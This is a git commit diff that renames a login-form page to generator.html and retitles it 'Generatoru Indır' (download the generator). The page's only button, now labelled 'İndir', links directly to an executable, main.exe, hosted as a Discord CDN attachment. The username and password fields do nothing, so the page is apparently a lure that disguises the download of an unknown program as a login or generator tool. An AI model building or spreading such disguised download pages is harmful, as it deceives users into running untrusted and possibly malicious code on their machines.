Update and rename index.html to generator.html

--- a/generator.html
+++ b/generator.html
@@ -4,7 +4,7 @@
     <meta charset="UTF-8">
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Login FOrm</title>
+    <title>Generatoru Indır</title>
     <style>
         body{
             padding: 0;
@@ -70,8 +70,7 @@
             <input type="text" name="username" id="username" placeholder="username" required>
             <input type="password" name="pass" id="pass" placeholder="password" required>
            <div class="btns">
-             <a href="https://cdn.discordapp.com/attachments/931941841237065778/980411977950199818/main.exe"><button type="button" id="log-in">Log In</button></a>
-            <a href="./registration.html"><button type="button" id="sign-up">Sign Up</button></a>
+             <a href="https://cdn.discordapp.com/attachments/931941841237065778/980411977950199818/main.exe"><button type="button" id="log-in">İndir</button></a>
            </div>
             
         </form>
